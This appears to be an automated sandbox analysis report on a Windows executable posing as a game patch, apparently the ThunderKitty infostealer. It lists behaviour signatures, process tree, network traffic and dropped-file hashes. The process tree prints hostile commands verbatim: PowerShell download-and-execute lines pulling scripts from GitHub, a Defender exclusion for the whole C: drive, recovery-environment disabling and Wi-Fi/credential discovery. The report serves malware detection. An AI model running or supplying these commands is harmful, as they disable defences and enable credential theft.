Analysis

  • max time kernel
    5s
  • max time network
    13s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13/08/2024, 14:19 UTC

General

  • Target

    Chameleon-Byfronpatch2.exe

  • Size

    9.2MB

  • MD5

    addbf6301c1ea797554a0152da23d5ae

  • SHA1

    01a22ed2bb77ff84546147098348a07bc0eecbc6

  • SHA256

    585c788d34f68b6fdc7695d5752e6450ae5f3e2c7dfd0dabaafefc598b29ecdb

  • SHA512

    9507a56c571d1f9ddf67dd9b5200c340416b00bb956c52fa88b8cd2108d5f789cdf5c04d60aa06c5c9bde8bec2e6a324c89435eec57708e1f66fd0a98c767a11

  • SSDEEP

    98304:NLTHcOdLkG6nUDvQlPU68hkY8LdYwTE/zTPy2R0r:mOdLkG9TChA/zLc

Malware Config

Signatures

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 4 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • System Network Connections Discovery 1 TTPs 1 IoCs

    Attempt to get a listing of network connections.

  • Gathers network information 2 TTPs 3 IoCs

    Uses commandline utility to view network configuration.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 56 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Chameleon-Byfronpatch2.exe
    "C:\Users\Admin\AppData\Local\Temp\Chameleon-Byfronpatch2.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious use of WriteProcessMemory
    PID:1068
    • C:\Windows\system32\attrib.exe
      attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
      2⤵
      • Views/modifies file attributes
      PID:3984
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -C "Add-MpPreference -ExclusionPath 'C:'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4480
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4888
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qwzcr3nm\qwzcr3nm.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:884
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9395.tmp" "c:\Users\Admin\AppData\Local\Temp\qwzcr3nm\CSCE265A0B6DDB64834B851568920694CAC.TMP"
          4⤵
            PID:2156
      • C:\Windows\system32\reagentc.exe
        reagentc.exe /disable
        2⤵
        • Drops file in System32 directory
        • Drops file in Windows directory
        PID:3956
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4808
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vp3movdc\vp3movdc.cmdline"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1948
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9396.tmp" "c:\Users\Admin\AppData\Local\Temp\vp3movdc\CSCCEC06B077B884009AFF8CB25DBE50B2.TMP"
            4⤵
              PID:3056
          • C:\Windows\system32\netsh.exe
            "C:\Windows\system32\netsh.exe" wlan show profiles
            3⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:1120
          • C:\Windows\system32\net.exe
            "C:\Windows\system32\net.exe" localgroup administrators
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4632
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 localgroup administrators
              4⤵
                PID:1052
            • C:\Windows\system32\netsh.exe
              "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
              3⤵
              • Modifies Windows Firewall
              • Event Triggered Execution: Netsh Helper DLL
              PID:2344
            • C:\Windows\system32\whoami.exe
              "C:\Windows\system32\whoami.exe" /all
              3⤵
                PID:3956
              • C:\Windows\system32\net.exe
                "C:\Windows\system32\net.exe" user
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1908
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 user
                  4⤵
                    PID:3436
                • C:\Windows\system32\ipconfig.exe
                  "C:\Windows\system32\ipconfig.exe" /displaydns
                  3⤵
                  • Gathers network information
                  PID:2016
                • C:\Windows\system32\net.exe
                  "C:\Windows\system32\net.exe" localgroup
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1544
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 localgroup
                    4⤵
                      PID:3596
                  • C:\Windows\System32\Wbem\WMIC.exe
                    "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
                    3⤵
                      PID:1968
                    • C:\Windows\system32\NETSTAT.EXE
                      "C:\Windows\system32\NETSTAT.EXE" -ano
                      3⤵
                      • System Network Connections Discovery
                      • Gathers network information
                      PID:1496
                    • C:\Windows\System32\Wbem\WMIC.exe
                      "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
                      3⤵
                        PID:5016
                      • C:\Windows\system32\ipconfig.exe
                        "C:\Windows\system32\ipconfig.exe" /all
                        3⤵
                        • Gathers network information
                        PID:632
                      • C:\Windows\system32\ROUTE.EXE
                        "C:\Windows\system32\ROUTE.EXE" print
                        3⤵
                          PID:3104
                        • C:\Windows\system32\ARP.EXE
                          "C:\Windows\system32\ARP.EXE" -a
                          3⤵
                          • Network Service Discovery
                          PID:380
                        • C:\Windows\system32\netsh.exe
                          "C:\Windows\system32\netsh.exe" wlan show profile
                          3⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Network Configuration Discovery: Wi-Fi Discovery
                          PID:3148
                      • C:\Windows\system32\cmd.exe
                        cmd /c rundll32.exe user32.dll,SwapMouseButton
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3576
                        • C:\Windows\system32\rundll32.exe
                          rundll32.exe user32.dll,SwapMouseButton
                          3⤵
                            PID:224

                      Network

                      • flag-us
                        DNS
                        api.telegram.org
                        ipconfig.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        api.telegram.org
                        IN A
                        Response
                        api.telegram.org
                        IN A
                        149.154.167.220
                      • flag-us
                        DNS
                        220.167.154.149.in-addr.arpa
                        ipconfig.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        220.167.154.149.in-addr.arpa
                        IN PTR
                        Response
                      • flag-us
                        DNS
                        raw.githubusercontent.com
                        ipconfig.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        raw.githubusercontent.com
                        IN A
                        Response
                        raw.githubusercontent.com
                        IN A
                        185.199.108.133
                        raw.githubusercontent.com
                        IN A
                        185.199.109.133
                        raw.githubusercontent.com
                        IN A
                        185.199.111.133
                        raw.githubusercontent.com
                        IN A
                        185.199.110.133
                      • flag-us
                        GET
                        https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1
                        powershell.exe
                        Remote address:
                        185.199.108.133:443
                        Request
                        GET /EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1 HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
                        Host: raw.githubusercontent.com
                        Connection: Keep-Alive
                        Response
                        HTTP/1.1 200 OK
                        Connection: keep-alive
                        Content-Length: 617
                        Cache-Control: max-age=300
                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                        Content-Type: text/plain; charset=utf-8
                        ETag: "f444ba7ea4531399f26b6eac1490d5c9ed57624eda8be597eb1b22193c39d280"
                        Strict-Transport-Security: max-age=31536000
                        X-Content-Type-Options: nosniff
                        X-Frame-Options: deny
                        X-XSS-Protection: 1; mode=block
                        X-GitHub-Request-Id: 95D6:3D1DA0:382913:46B64E:66BB6BAD
                        Accept-Ranges: bytes
                        Date: Tue, 13 Aug 2024 14:20:29 GMT
                        Via: 1.1 varnish
                        X-Served-By: cache-lcy-eglc8600042-LCY
                        X-Cache: MISS
                        X-Cache-Hits: 0
                        X-Timer: S1723558830.626993,VS0,VE249
                        Vary: Authorization,Accept-Encoding,Origin
                        Access-Control-Allow-Origin: *
                        Cross-Origin-Resource-Policy: cross-origin
                        X-Fastly-Request-ID: de723d08182fdcf76e5e708c77617e09ebf783dc
                        Expires: Tue, 13 Aug 2024 14:25:29 GMT
                        Source-Age: 0
                      • flag-us
                        GET
                        https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1
                        powershell.exe
                        Remote address:
                        185.199.108.133:443
                        Request
                        GET /EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1 HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
                        Host: raw.githubusercontent.com
                        Connection: Keep-Alive
                        Response
                        HTTP/1.1 200 OK
                        Connection: keep-alive
                        Content-Length: 5753
                        Cache-Control: max-age=300
                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                        Content-Type: text/plain; charset=utf-8
                        ETag: "36cc62445a08a962a9d3aa0a0bfd23233e35ac3e4082aa53adb300575fb6e171"
                        Strict-Transport-Security: max-age=31536000
                        X-Content-Type-Options: nosniff
                        X-Frame-Options: deny
                        X-XSS-Protection: 1; mode=block
                        X-GitHub-Request-Id: FDD1:1CE552:1A5CAF:2035D4:66BB6BAB
                        Accept-Ranges: bytes
                        Date: Tue, 13 Aug 2024 14:20:29 GMT
                        Via: 1.1 varnish
                        X-Served-By: cache-lon420116-LON
                        X-Cache: MISS
                        X-Cache-Hits: 0
                        X-Timer: S1723558830.629716,VS0,VE128
                        Vary: Authorization,Accept-Encoding,Origin
                        Access-Control-Allow-Origin: *
                        Cross-Origin-Resource-Policy: cross-origin
                        X-Fastly-Request-ID: 852db7b73d76fb6d8b13c24a45c96c05d0d84505
                        Expires: Tue, 13 Aug 2024 14:25:29 GMT
                        Source-Age: 0
                      • flag-us
                        DNS
                        133.108.199.185.in-addr.arpa
                        ipconfig.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        133.108.199.185.in-addr.arpa
                        IN PTR
                        Response
                        133.108.199.185.in-addr.arpa
                        IN PTR
                        cdn-185-199-108-133githubcom
                      • flag-us
                        DNS
                        g.bing.com
                        ipconfig.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        g.bing.com
                        IN A
                        Response
                        g.bing.com
                        IN CNAME
                        g-bing-com.dual-a-0034.a-msedge.net
                        g-bing-com.dual-a-0034.a-msedge.net
                        IN CNAME
                        dual-a-0034.a-msedge.net
                        dual-a-0034.a-msedge.net
                        IN A
                        13.107.21.237
                        dual-a-0034.a-msedge.net
                        IN A
                        204.79.197.237
                      • flag-us
                        GET
                        https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=983520ae42314175812d6c5549b0a570&localId=w:2D7FBA3B-257B-DA9C-9BEE-3873FD814D61&deviceId=6896205358185221&anid=
                        Remote address:
                        13.107.21.237:443
                        Request
                        GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=983520ae42314175812d6c5549b0a570&localId=w:2D7FBA3B-257B-DA9C-9BEE-3873FD814D61&deviceId=6896205358185221&anid= HTTP/2.0
                        host: g.bing.com
                        accept-encoding: gzip, deflate
                        user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                        Response
                        HTTP/2.0 204
                        cache-control: no-cache, must-revalidate
                        pragma: no-cache
                        expires: Fri, 01 Jan 1990 00:00:00 GMT
                        set-cookie: MUID=16989FAAE546674022188B70E4A6660D; domain=.bing.com; expires=Sun, 07-Sep-2025 14:20:31 GMT; path=/; SameSite=None; Secure; Priority=High;
                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                        access-control-allow-origin: *
                        x-cache: CONFIG_NOCACHE
                        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                        x-msedge-ref: Ref A: 592E06E2D70541EB91FB451AD1682A27 Ref B: LON04EDGE1122 Ref C: 2024-08-13T14:20:31Z
                        date: Tue, 13 Aug 2024 14:20:30 GMT
                      • flag-us
                        GET
                        https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=983520ae42314175812d6c5549b0a570&localId=w:2D7FBA3B-257B-DA9C-9BEE-3873FD814D61&deviceId=6896205358185221&anid=
                        Remote address:
                        13.107.21.237:443
                        Request
                        GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=983520ae42314175812d6c5549b0a570&localId=w:2D7FBA3B-257B-DA9C-9BEE-3873FD814D61&deviceId=6896205358185221&anid= HTTP/2.0
                        host: g.bing.com
                        accept-encoding: gzip, deflate
                        user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                        cookie: MUID=16989FAAE546674022188B70E4A6660D
                        Response
                        HTTP/2.0 204
                        cache-control: no-cache, must-revalidate
                        pragma: no-cache
                        expires: Fri, 01 Jan 1990 00:00:00 GMT
                        set-cookie: MSPTC=Wb4ONtm53ejkU487KI-Q6IVpGfYOD5pXdCY4de8M5qY; domain=.bing.com; expires=Sun, 07-Sep-2025 14:20:32 GMT; path=/; Partitioned; secure; SameSite=None
                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                        access-control-allow-origin: *
                        x-cache: CONFIG_NOCACHE
                        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                        x-msedge-ref: Ref A: 43524FD91D884AD4B9E20979AA3602EA Ref B: LON04EDGE1122 Ref C: 2024-08-13T14:20:32Z
                        date: Tue, 13 Aug 2024 14:20:31 GMT
                      • flag-us
                        GET
                        https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=983520ae42314175812d6c5549b0a570&localId=w:2D7FBA3B-257B-DA9C-9BEE-3873FD814D61&deviceId=6896205358185221&anid=
                        Remote address:
                        13.107.21.237:443
                        Request
                        GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=983520ae42314175812d6c5549b0a570&localId=w:2D7FBA3B-257B-DA9C-9BEE-3873FD814D61&deviceId=6896205358185221&anid= HTTP/2.0
                        host: g.bing.com
                        accept-encoding: gzip, deflate
                        user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                        cookie: MUID=16989FAAE546674022188B70E4A6660D; MSPTC=Wb4ONtm53ejkU487KI-Q6IVpGfYOD5pXdCY4de8M5qY
                        Response
                        HTTP/2.0 204
                        cache-control: no-cache, must-revalidate
                        pragma: no-cache
                        expires: Fri, 01 Jan 1990 00:00:00 GMT
                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                        access-control-allow-origin: *
                        x-cache: CONFIG_NOCACHE
                        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                        x-msedge-ref: Ref A: 295D2F9956D344BA8A7A3D7A43A94EE3 Ref B: LON04EDGE1122 Ref C: 2024-08-13T14:20:32Z
                        date: Tue, 13 Aug 2024 14:20:31 GMT
                      • flag-us
                        DNS
                        83.210.23.2.in-addr.arpa
                        ipconfig.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        83.210.23.2.in-addr.arpa
                        IN PTR
                        Response
                        83.210.23.2.in-addr.arpa
                        IN PTR
                        a2-23-210-83deploystaticakamaitechnologiescom
                      • flag-us
                        DNS
                        72.32.126.40.in-addr.arpa
                        ipconfig.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        72.32.126.40.in-addr.arpa
                        IN PTR
                        Response
                      • flag-us
                        DNS
                        237.21.107.13.in-addr.arpa
                        ipconfig.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        237.21.107.13.in-addr.arpa
                        IN PTR
                        Response
                      • flag-us
                        DNS
                        55.36.223.20.in-addr.arpa
                        Remote address:
                        8.8.8.8:53
                        Request
                        55.36.223.20.in-addr.arpa
                        IN PTR
                        Response
                      • 149.154.167.220:443
                        api.telegram.org
                        tls
                        Chameleon-Byfronpatch2.exe
                        920 B
                        6.8kB
                        12
                        12
                      • 149.154.167.220:443
                        api.telegram.org
                        tls
                        Chameleon-Byfronpatch2.exe
                        86.0kB
                        12.9kB
                        81
                        57
                      • 185.199.108.133:443
                        https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1
                        tls, http
                        powershell.exe
                        997 B
                        7.1kB
                        10
                        11

                        HTTP Request

                        GET https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1

                        HTTP Response

                        200
                      • 185.199.108.133:443
                        https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1
                        tls, http
                        powershell.exe
                        985 B
                        11.1kB
                        10
                        14

                        HTTP Request

                        GET https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1

                        HTTP Response

                        200
                      • 13.107.21.237:443
                        https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=983520ae42314175812d6c5549b0a570&localId=w:2D7FBA3B-257B-DA9C-9BEE-3873FD814D61&deviceId=6896205358185221&anid=
                        tls, http2
                        3.0kB
                        10.7kB
                        25
                        19

                        HTTP Request

                        GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=983520ae42314175812d6c5549b0a570&localId=w:2D7FBA3B-257B-DA9C-9BEE-3873FD814D61&deviceId=6896205358185221&anid=

                        HTTP Response

                        204

                        HTTP Request

                        GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=983520ae42314175812d6c5549b0a570&localId=w:2D7FBA3B-257B-DA9C-9BEE-3873FD814D61&deviceId=6896205358185221&anid=

                        HTTP Response

                        204

                        HTTP Request

                        GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=983520ae42314175812d6c5549b0a570&localId=w:2D7FBA3B-257B-DA9C-9BEE-3873FD814D61&deviceId=6896205358185221&anid=

                        HTTP Response

                        204
                      • 8.8.8.8:53
                        api.telegram.org
                        dns
                        ipconfig.exe
                        62 B
                        78 B
                        1
                        1

                        DNS Request

                        api.telegram.org

                        DNS Response

                        149.154.167.220

                      • 8.8.8.8:53
                        220.167.154.149.in-addr.arpa
                        dns
                        ipconfig.exe
                        74 B
                        167 B
                        1
                        1

                        DNS Request

                        220.167.154.149.in-addr.arpa

                      • 8.8.8.8:53
                        raw.githubusercontent.com
                        dns
                        ipconfig.exe
                        71 B
                        135 B
                        1
                        1

                        DNS Request

                        raw.githubusercontent.com

                        DNS Response

                        185.199.108.133
                        185.199.109.133
                        185.199.111.133
                        185.199.110.133

                      • 8.8.8.8:53
                        133.108.199.185.in-addr.arpa
                        dns
                        ipconfig.exe
                        74 B
                        118 B
                        1
                        1

                        DNS Request

                        133.108.199.185.in-addr.arpa

                      • 8.8.8.8:53
                        g.bing.com
                        dns
                        ipconfig.exe
                        56 B
                        151 B
                        1
                        1

                        DNS Request

                        g.bing.com

                        DNS Response

                        13.107.21.237
                        204.79.197.237

                      • 8.8.8.8:53
                        83.210.23.2.in-addr.arpa
                        dns
                        ipconfig.exe
                        70 B
                        133 B
                        1
                        1

                        DNS Request

                        83.210.23.2.in-addr.arpa

                      • 8.8.8.8:53
                        72.32.126.40.in-addr.arpa
                        dns
                        ipconfig.exe
                        71 B
                        157 B
                        1
                        1

                        DNS Request

                        72.32.126.40.in-addr.arpa

                      • 8.8.8.8:53
                        237.21.107.13.in-addr.arpa
                        dns
                        ipconfig.exe
                        72 B
                        158 B
                        1
                        1

                        DNS Request

                        237.21.107.13.in-addr.arpa

                      • 8.8.8.8:53
                        55.36.223.20.in-addr.arpa
                        dns
                        71 B
                        157 B
                        1
                        1

                        DNS Request

                        55.36.223.20.in-addr.arpa

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                        Filesize

                        2KB

                        MD5

                        d85ba6ff808d9e5444a4b369f5bc2730

                        SHA1

                        31aa9d96590fff6981b315e0b391b575e4c0804a

                        SHA256

                        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                        SHA512

                        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        1KB

                        MD5

                        db5c65c5bb3a0b8a1babd09b9689bba2

                        SHA1

                        c6b985c3ba6cd5541051f280e42d3ebdda34ba35

                        SHA256

                        e813a8003afc17037bc8d36e9a2e6df1f089191e47fcb93bccc9130f4974f7d4

                        SHA512

                        23698b318565b650ed44abef445a3548283ac7bc270a432421acb16c03a3593e4c56a5e65c6c5fe721dad0e41e0c6f929ac1350249a47788ea68f66083021762

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        1KB

                        MD5

                        539bc6eade29a52ea94d29ad1f200dbf

                        SHA1

                        4d6218efa5d118f957a0df5f4e62432ab5f41bc3

                        SHA256

                        829cb8009ad74773786c5195939948365c1ca2fa70abcd2d3b10eb48393337f9

                        SHA512

                        b1b230bfd72e14d044b3db6fa738cda1110ff6137cd4b9dcfc5fb45a64fb93610584971573073e575b0f2e46015ac2f0c2e4ab66101f266ec5a9ab8a31dea089

                      • C:\Users\Admin\AppData\Local\Temp\RES9395.tmp

                        Filesize

                        1KB

                        MD5

                        7a961d579a10b9f4f59daf327c36a45d

                        SHA1

                        9426663308cee41dae37db45d7e70b5fc4a3c12e

                        SHA256

                        63fd6218df55710884867baff834b916c18ebfc3e253362d3675c78f5525d128

                        SHA512

                        7333489ce5b4268b76e376069389e62fad70be711f3fc1aeef1a959ba9fe549f8eabba52e04e9274da54511be463be3b80fdb65f455cb2309d5c5e747ff8285a

                      • C:\Users\Admin\AppData\Local\Temp\RES9396.tmp

                        Filesize

                        1KB

                        MD5

                        dcce57488f700c9f99dfee32bf537758

                        SHA1

                        0e7a169b94dddf9e5c6d7cad760982ab516aa24a

                        SHA256

                        7bb267f28bec78bd73031d067ae67d8d7eaadfb17d8ea0ccf72d8b68e93bccab

                        SHA512

                        78b484a602087c34a86f973e48ce4bdf994a4aac85e89f160822775d336cbb0423873c31857c23df69f9d244f1f2c146e4a19bf1037d94cd8a810184f156e948

                      • C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

                        Filesize

                        77KB

                        MD5

                        b82699a2c28d371feab8e7b700784d60

                        SHA1

                        33bab83b93137fffb895840760a780be5a504ab5

                        SHA256

                        b39f258931867a756b731f31f95f89381fa3f6de0f7c7ca99ed08c4b1a4c03f6

                        SHA512

                        8909f6d94b4ebab8f8c889ffbd0a6a34890417f569be36fe901310c1f725e4966c2571bdd64186395cbd999c2534b408b0cdae4993bc8a1910a9520f6a8eb43d

                      • C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

                        Filesize

                        61KB

                        MD5

                        20367132bbdb4a8bc6384e3a4fd811d2

                        SHA1

                        a9b059c3755c280c32442c6f25388797ddeae7ca

                        SHA256

                        e63548726882e2594626481de06a639b2db3d8a687451f204c09ff570120b2fd

                        SHA512

                        d0266a252b288cb67c9e16eb9681f83cb67212f3c54e289a2249848651a3b5cf80ff63fe808541bdf2df01d88416c3e209f1accc46cbff514f872939b75271f8

                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ql5cpcvh.jhi.ps1

                        Filesize

                        60B

                        MD5

                        d17fe0a3f47be24a6453e9ef58c94641

                        SHA1

                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                        SHA256

                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                        SHA512

                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                      • C:\Users\Admin\AppData\Local\Temp\qwzcr3nm\qwzcr3nm.dll

                        Filesize

                        4KB

                        MD5

                        20d0a4f8ccbea18bbeb81ece18e8d117

                        SHA1

                        a6d0f26cba4da989604c7347ae02ab8124265b79

                        SHA256

                        99a20c837b5b1b03b0eeaf941809ac46b0c180d90c7698b05cc21169ae2b004d

                        SHA512

                        7157bf3a9b29e259d064c3b857b9ebc1b3f4984ccba7fb29f497f49b76c30f5fad8e3a961e7c9e3fe51376874e6f095350066d16ad410fec03b6a05601e57b39

                      • C:\Users\Admin\AppData\Local\Temp\vp3movdc\vp3movdc.dll

                        Filesize

                        4KB

                        MD5

                        9b971d9ea5c640f159b94ff6fde3c158

                        SHA1

                        53558d242c727c30dd8637a4b8aa7cb650eb3fae

                        SHA256

                        7d6b70b7c4db978c8d90854a01f55423e260988caf6f71fce4b764f289ee3e53

                        SHA512

                        d430a293e079ce5625ac688bd5e85530a739b40a7239796cc6c13925ccb10a776d9029e94f252689e1652f842a9cdc8dd4a53a6cf87f72d9947898216dfda23f

                      • C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

                        Filesize

                        2KB

                        MD5

                        9758656bbe8589c66bb241b052490c72

                        SHA1

                        b73da83fb3ae6b86c6365769a04de9845d5c602c

                        SHA256

                        e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

                        SHA512

                        da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

                      • C:\Windows\system32\drivers\etc\hosts

                        Filesize

                        2KB

                        MD5

                        33963639fb0ee0d79107103504711c9e

                        SHA1

                        b5c525632b94582ac863c600bc613ab658fab61b

                        SHA256

                        c2d71376ebf448ca83881ffed011973822c8f755a563b1087214bf571692ad89

                        SHA512

